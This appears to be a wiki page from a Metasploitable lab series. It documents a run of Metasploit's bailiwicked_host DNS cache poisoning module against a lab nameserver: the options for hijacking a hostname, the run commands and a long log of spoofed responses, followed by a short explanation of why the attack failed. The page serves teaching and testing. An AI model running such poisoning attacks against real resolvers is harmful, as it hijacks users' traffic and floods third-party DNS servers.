Module: auxiliary/spoof/dns/bailiwicked_host
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2008-07-21
Provided by:
I)ruid <druid@caughq.org>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HOSTNAME example.com yes Hostname to hijack
INTERFACE no The name of the interface
NEWADDR 45.33.40.53 yes New address for hostname
RECONS 208.67.222.222 yes The nameserver used for reconnaissance
RHOST 10.0.0.27 yes The target address
SNAPLEN 65535 yes The number of bytes to capture
SRCADDR Real yes The source address to use for sending the queries (Accepted: Real, Random)
SRCPORT 0 yes The target server's source query port (0 for automatic)
TIMEOUT 500 yes The number of seconds to wait for new data
TTL 47695 yes The TTL for the malicious host entry
XIDS 0 yes The number of XIDs to try for each query (0 for automatic)
Failure to check exploit
No die with the check, again:
msf auxiliary(bailiwicked_host) > check [*] 10.0.0.27 - Cannot reliably check exploitability.
Before
Before the attack, using dig:
msf auxiliary(bailiwicked_host) > dig +short -t ns example.com @10.0.0.27 [*] exec: dig +short -t ns example.com @10.0.0.27 a.iana-servers.net. b.iana-servers.net.
Executing
Execute attack with a run:
msf auxiliary(bailiwicked_host) > run
Nope.
msf auxiliary(bailiwicked_host) > run [*] Targeting nameserver 10.0.0.27 for injection of example.com. as 45.33.40.53 [*] Querying recon nameserver for com.'s nameservers... [*] Got an NS record: com. 166090 IN NS e.gtld-servers.net. [*] Querying recon nameserver for address of e.gtld-servers.net.... [*] Got an A record: e.gtld-servers.net. 800 IN A 192.12.94.30 [*] Checking Authoritativeness: Querying 192.12.94.30 for com.... [*] e.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS j.gtld-servers.net. [*] Querying recon nameserver for address of j.gtld-servers.net.... [*] Got an A record: j.gtld-servers.net. 18798 IN A 192.48.79.30 [*] Checking Authoritativeness: Querying 192.48.79.30 for com.... [*] j.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS f.gtld-servers.net. [*] Querying recon nameserver for address of f.gtld-servers.net.... [*] Got an A record: f.gtld-servers.net. 5329 IN A 192.35.51.30 [*] Checking Authoritativeness: Querying 192.35.51.30 for com.... [*] f.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS c.gtld-servers.net. [*] Querying recon nameserver for address of c.gtld-servers.net.... [*] Got an A record: c.gtld-servers.net. 29013 IN A 192.26.92.30 [*] Checking Authoritativeness: Querying 192.26.92.30 for com.... [*] c.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS a.gtld-servers.net. [*] Querying recon nameserver for address of a.gtld-servers.net.... [*] Got an A record: a.gtld-servers.net. 79308 IN A 192.5.6.30 [*] Checking Authoritativeness: Querying 192.5.6.30 for com.... [*] a.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS k.gtld-servers.net. [*] Querying recon nameserver for address of k.gtld-servers.net.... [*] Got an A record: k.gtld-servers.net. 11880 IN A 192.52.178.30 [*] Checking Authoritativeness: Querying 192.52.178.30 for com.... [*] k.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS h.gtld-servers.net. [*] Querying recon nameserver for address of h.gtld-servers.net.... [*] Got an A record: h.gtld-servers.net. 82036 IN A 192.54.112.30 [*] Checking Authoritativeness: Querying 192.54.112.30 for com.... [*] h.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS g.gtld-servers.net. [*] Querying recon nameserver for address of g.gtld-servers.net.... [*] Got an A record: g.gtld-servers.net. 78272 IN A 192.42.93.30 [*] Checking Authoritativeness: Querying 192.42.93.30 for com.... [*] g.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS m.gtld-servers.net. [*] Querying recon nameserver for address of m.gtld-servers.net.... [*] Got an A record: m.gtld-servers.net. 26577 IN A 192.55.83.30 [*] Checking Authoritativeness: Querying 192.55.83.30 for com.... [*] m.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS l.gtld-servers.net. [*] Querying recon nameserver for address of l.gtld-servers.net.... [*] Got an A record: l.gtld-servers.net. 15180 IN A 192.41.162.30 [*] Checking Authoritativeness: Querying 192.41.162.30 for com.... [*] l.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS d.gtld-servers.net. [*] Querying recon nameserver for address of d.gtld-servers.net.... [*] Got an A record: d.gtld-servers.net. 19773 IN A 192.31.80.30 [*] Checking Authoritativeness: Querying 192.31.80.30 for com.... [*] d.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS i.gtld-servers.net. [*] Querying recon nameserver for address of i.gtld-servers.net.... [*] Got an A record: i.gtld-servers.net. 22833 IN A 192.43.172.30 [*] Checking Authoritativeness: Querying 192.43.172.30 for com.... [*] i.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Got an NS record: com. 166090 IN NS b.gtld-servers.net. [*] Querying recon nameserver for address of b.gtld-servers.net.... [*] Got an A record: b.gtld-servers.net. 45159 IN A 192.33.14.30 [*] Checking Authoritativeness: Querying 192.33.14.30 for com.... [*] b.gtld-servers.net. is authoritative for com., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 2/106/17 [*] Sending 1 spoofed replies from each nameserver (13) for each query [*] Attempting to inject a poison record for example.com. into 10.0.0.27:0... [*] Sent 1000 queries and 13000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 3/87/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 2000 queries and 39000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.02 | min/max/avg replies: 5/78/11 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 3000 queries and 52000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.05 | min/max/avg replies: 7/85/23 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 4000 queries and 78000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 1/80/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 5000 queries and 104000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 4/88/19 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 6000 queries and 130000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/84/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 7000 queries and 156000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/78/15 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 8000 queries and 169000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.05 | min/max/avg replies: 6/82/24 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 9000 queries and 195000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 3/91/15 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 10000 queries and 208000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 1/75/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 11000 queries and 234000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.04 | min/max/avg replies: 1/93/19 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 12000 queries and 260000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 6/82/13 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 13000 queries and 273000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/78/20 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 14000 queries and 299000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.03 | min/max/avg replies: 7/95/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 15000 queries and 325000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.04 | min/max/avg replies: 6/100/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 16000 queries and 351000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/77/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 17000 queries and 377000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 6/84/21 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 18000 queries and 403000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/74/14 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 19000 queries and 416000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.05 | min/max/avg replies: 3/83/23 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 20000 queries and 442000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 3/88/16 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 21000 queries and 455000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/80/21 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 22000 queries and 481000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.57/0.06 | min/max/avg replies: 5/293/28 [*] Now sending 3 spoofed replies from each nameserver (13) for each query [*] Sent 23000 queries and 520000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.03 | min/max/avg replies: 6/70/12 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 24000 queries and 533000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/85/23 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 25000 queries and 559000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.02 | min/max/avg replies: 4/77/12 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 26000 queries and 572000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.04 | min/max/avg replies: 6/91/22 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 27000 queries and 598000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 2/78/16 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 28000 queries and 611000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/80/19 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 29000 queries and 637000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.11/0.02 | min/max/avg replies: 5/50/10 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 30000 queries and 650000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 6/82/21 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 31000 queries and 676000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 6/78/15 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 32000 queries and 689000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/84/21 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 33000 queries and 715000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.03/0.2/0.07 | min/max/avg replies: 14/93/33 [*] Now sending 3 spoofed replies from each nameserver (13) for each query [*] Sent 34000 queries and 754000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/81/19 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 35000 queries and 780000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/75/19 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 36000 queries and 806000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.02 | min/max/avg replies: 5/79/11 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 37000 queries and 819000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.23/0.05 | min/max/avg replies: 6/92/24 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 38000 queries and 845000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.24/0.04 | min/max/avg replies: 2/105/21 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 39000 queries and 871000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 5/84/15 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 40000 queries and 884000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.05 | min/max/avg replies: 6/88/23 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 41000 queries and 910000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 1/92/14 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 42000 queries and 923000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 6/85/22 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 43000 queries and 949000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 2/78/16 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 44000 queries and 962000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.22/0.04 | min/max/avg replies: 5/76/17 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 45000 queries and 975000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/83/19 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 46000 queries and 1001000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/80/17 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 47000 queries and 1014000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 6/92/17 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 48000 queries and 1027000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/82/19 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 49000 queries and 1053000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.03 | min/max/avg replies: 6/85/15 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 50000 queries and 1066000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 5/81/20 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 51000 queries and 1092000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/80/20 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 52000 queries and 1118000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.17/0.02 | min/max/avg replies: 1/80/12 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 53000 queries and 1131000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.05 | min/max/avg replies: 3/86/23 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 54000 queries and 1157000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 6/85/18 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 55000 queries and 1183000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.03 | min/max/avg replies: 4/94/14 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 56000 queries and 1196000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 5/85/20 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 57000 queries and 1222000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/80/17 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 58000 queries and 1235000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 6/87/21 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 59000 queries and 1261000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/81/14 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 60000 queries and 1274000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.05 | min/max/avg replies: 6/92/22 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 61000 queries and 1300000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.21/0.03 | min/max/avg replies: 5/91/14 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 62000 queries and 1313000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.04 | min/max/avg replies: 5/87/21 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 63000 queries and 1339000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 0/78/15 [*] Now sending 1 spoofed replies from each nameserver (13) for each query [*] Sent 64000 queries and 1352000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.2/0.04 | min/max/avg replies: 5/94/20 [*] Now sending 2 spoofed replies from each nameserver (13) for each query [*] Sent 65000 queries and 1378000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.01/0.18/0.03 | min/max/avg replies: 5/79/15 [*] Now sending 1 spoofed replies from each nameserver (13) for each query ^C[-] Auxiliary interrupted by the console user [*] Auxiliary module execution completed msf auxiliary(bailiwicked_host) > |
Reason for Failure
On another note, before using Metasploit to test your DNS infrastructure to see if it is exploitable, it is important to know whether your local network allows spoofed packets out. Many firewalls can be configured to drop spoofed packets from internal systems, and even my little LinkSys router does this. Because there is no mechanism in Metasploit currently (as far as I know) to detect whether your local network filters spoofed packets (and building such a mechanism would be tricky for various technical reasons), an incorrect assumption can result in a cache poisoning attack that has no possibility of succeeding but that also generates thousands of DNS queries at the same time.- https://cipherdyne.org/blog/2008/07/metasploit-dns-cache-poisoning-and-iptables-countermeasures.html
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|